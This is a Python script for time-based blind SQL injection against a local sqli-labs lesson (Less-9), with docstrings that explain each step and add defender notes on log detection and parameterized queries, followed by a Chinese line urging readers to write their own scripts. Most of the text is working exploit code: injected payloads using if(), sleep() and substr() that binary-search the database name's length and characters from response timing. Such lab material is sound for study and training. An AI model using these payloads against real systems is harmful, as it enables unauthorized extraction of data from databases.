# @Author:Mirror
import time
import requests
# Module-level counter that nothing below reads or writes; it is dead state.
db_len = 0
def get_schema_len (url):
    """Infer the length of the current database name by timing responses.

    Binary-searches the range 0..20. Each probe issues one GET whose query
    string asks the back end to ``sleep(0.4)`` when ``length(database())``
    exceeds ``mid``; a round trip of 0.4 s or more is read as "true" and the
    lower bound moves up, otherwise the upper bound moves down.

    Args:
        url: Base URL of the page under test. The probe string is passed as
            the second positional argument of ``requests.get``, which is
            ``params``, so it is appended to ``url`` as the query string.

    Returns:
        The final ``left`` bound, printed before being returned. The local
        ``len`` shadows the builtin of the same name.

    Defender notes: the run is a burst of near-identical GETs whose query
    string carries ``if(``/``sleep(`` and ends in ``--+``, each taking a
    suspiciously uniform ~0.4 s, which is easy to spot in access logs or
    with a WAF rule on those tokens. Parameterized queries remove the
    injection point that makes this inference possible at all.
    """
    len = 0
    left = 0
    right = 20
    while (left <= right):
        mid = left + (right - left)//2;
        # Payload is built with str.format; only ``mid`` changes per probe.
        data = "id=1' and if(length(database())>{},sleep(0.4),1)--+".format(mid)
        one = time.time()
        res = requests.get(url,data)
        # print (res.url)
        two = time.time()
        # Wall-clock latency is the only signal; it is compared against the
        # same 0.4 s the payload asks the server to sleep.
        if abs(two - one) >= (0.4):
            left = mid + 1
        else:
            right = mid - 1
    len = left
    print (len)
    return len
def get_schema_name(url):
    """Recover the current database name one character at a time by timing.

    Calls ``get_schema_len`` for the length, then for each position ``i``
    binary-searches the code-point range 0..128 with a ``substr(...) > chr``
    comparison wrapped in the same ``sleep(0.4)`` conditional. The final
    ``left`` bound for each position is appended as ``chr(left)``. The
    assembled name is printed; nothing is returned.

    Args:
        url: Base URL of the page under test; as in ``get_schema_len`` the
            probe string becomes the request's query string.

    Defender notes: this stage sends roughly eight probes per character,
    every one logged as a GET with ``substr(database()`` and ``sleep(`` in
    the query string (``res.url`` is printed for each). Server-side, the
    telltale is a stream of requests whose latency alternates between ~0 s
    and ~0.4 s; rate limiting and query-string inspection both surface it,
    and parameterized queries prevent it. ``len`` shadows the builtin here.
    """
    len = get_schema_len(url)
    db_name = ''
    for i in range(1,len+1):
        left = 0
        right = 128
        while(left <= right):
            mid = left + (right - left)//2
            # Position ``i`` and candidate character ``chr(mid)`` are the only
            # per-probe variations.
            data = "id=1' and if (substr(database(),{},1)>'{}',sleep(0.4),1)--+".format(i,chr(mid))
            one = time.time()
            res = requests.get(url,data)
            print (res.url)
            two = time.time()
            if abs(two - one) >=0.4:
                left = mid + 1
            else :
                right = mid - 1
        db_name+=chr(left)
    print (db_name)
# Runs unconditionally at import time against a local sqli-labs lesson
# (Less-9); there is no ``if __name__ == "__main__":`` guard.
url = "http://localhost:800/sqli-labs/Less-9/"
get_schema_name(url)
以上是一部分,要学会自己编写脚本喔!库名好像都是大写